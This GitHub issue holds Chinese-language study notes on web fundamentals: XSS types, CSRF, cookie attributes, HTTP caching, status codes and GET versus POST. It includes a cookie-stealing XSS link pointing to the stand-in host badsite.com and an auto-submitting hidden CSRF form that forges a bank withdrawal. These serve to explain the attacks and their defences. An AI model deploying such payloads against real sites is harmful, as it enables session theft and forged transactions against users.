-
Notifications
You must be signed in to change notification settings - Fork 2
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
计算机基础 #4
Comments
XSSXSS中文名跨站脚本攻击,是黑客通过某种方式在网站中(你的网站或者你使用的正规网站)注入恶意代码。恶意代码与正常代码混在一起,形式可能是一个script远程脚本引用、内嵌脚本、或者一个覆盖正常网页的内嵌网页。 黑客可以用XSS攻击做什么事(:question:)
XSS依据注入恶意代码的方式可分为三类:反射型、DOM型和持久型XSS攻击。 1. 反射型反射型的攻击步骤:
场景实例: 点击这里有[更多学习资料](http://example.com/search?content=<script>http://badsite.com?cookie=document.cookie</script>) 另外,恶意链接可以存在于a链接、图片src或者插入的script标签中等等。
2. 基于DOM型基于DOM型XSS是由前端使用JS操作DOM时不严谨,将恶意代码插入到页面中。浏览器执行恶意代码,从而泄露了用户敏感数据。 场景实例: 3. 持久型持久型就是XSS恶意代码被存储到数据库中,用户访问相关数据网页时,含有恶意代码的数据被拼接到网页中,从而导致恶意代码被解析。 如何缓解防御XSS攻击
参考资料: |
CSRFCSRF即跨站请求伪造。 攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。 如何实现CSRF攻击最容易实现的是 Get 请求,一般进入黑客网站后,可以通过设置 img的 src 属性来自动发起请求在黑客的网站中,构造隐藏表单来自动发起 Post 请求通过引诱链接诱惑用户点击触发请求,利用 a 标签的 href。例如:
例2:除了使用GET请求,黑客网站通过如下方法嵌入隐藏表单,也可以冒充用户发起POST请求 <form action="https://bank.example.com/withdraw" method="POST">
<input type="hidden" name="account" value="bob">
<input type="hidden" name="amount" value="1000000">
<input type="hidden" name="for" value="mallory">
</form>
<script>window.addEventListener('DOMContentLoaded', (e) => { document.querySelector('form').submit(); }</script> CSRF攻击和XSS攻击有什么区别?CSRF 攻击不需要将恶意代码注入用户的页面,仅仅是利用服务器的漏洞和用户的登录状态来实施攻击。具体方式是引诱用户访问黑客网站,在用户不知情的情况下通过黑客网站的src属性值对目标用户站点发出请求,以实现某种操作的目的。 那应该如何防范CSRF攻击?
参考链接: |
Cookie因为HTTP是无状态协议,即无论user agent发起多少次请求,服务器都不认识你。那么如果UA想要保存如游戏点数、购物车、登录、访问记录等等状态怎么办呢?cookie的原理就是在UA的请求头中添加一个这么一个可控制生命周期的字段,以记录UA希望保存的状态。 Cookie的主要用途有以下三类:
"小饼干"的头部
下面是真实的请求和响应头部的样子: //响应头
Set-Cookie:__Host-user_session_same_site=mEi-Y-Bh_cfkX_hTn1smCFdNs; path=/; expires=Wed, 22 Apr 2020 06:55:20 GMT; secure; HttpOnly; SameSite=Strict;
Set-Cookie:key2=value2;
//请求头(多个小饼干以分号间隔)
Cookie: __Host-user_session_same_site=mEi-Y-Bh_cfkX_hTn1smCFdNs;key2=value2; Cookie属性上述的两种主要的网络安全问题(XSS, CSRF)都与Cookie有关,因此Cookie的属性除了name/value以外,还有其他多个属性,这些属性都与安全问题相关。 下面的属性在请求头中以key=value形式存在
以及另外两个安全相关配置
第三方Cookie尽管Cookie有其作用范围(Scope,通过Domain和Path控制),但是我们访问某个网站,常常可以看到来自不同域的cookie 截图来自hellomagazine.com 这种非当前域的cookie即第三方cookie。这是由网页中引入的其他域的静态资源(如图片、外部脚本等)有关。 遗留问题⭐实际测试的时候引用的外部静态资源,Chrome现在有CORB保护策略,先放这儿,改天再看 参考资料: |
强缓存和协商缓存缓存可以节省网络带宽,使用户更快地访问网络资源 。但是随之而来的问题是本地数据内存消耗和如何保持最新状态的问题。 强缓存第一次请求时响应头包括以下头部,以UA时间为准,该时间内命中缓存。 相关头部
协商缓存
ETag:为相应头部字段,表示资源内容的唯一标识,随服务器response返回;
注:W/表示弱验证 上述缓存相关的请求在遇到资源未发生修改时,会返回状态码304。 作者:名扬 |
常用状态码https://juejin.im/post/5872309261ff4b005c4580d4#heading-5 我认为需要记忆的有以下: |
请求方法HTTP的GET和POST请求的区别HTTP的请求方法是一种规范,实质上他们的TCP数据包没有区别。根据规范浏览器和服务器端对于这两种请求的处理方法不同,具体用法以及效果如下:
|
CORS//todo; |
计算机网络
网络协议
HTTP/1.0 HTTP/1.1 HTTP/2.0 HTTPS
DNS
TCP
UDP
网络安全
操作系统
The text was updated successfully, but these errors were encountered: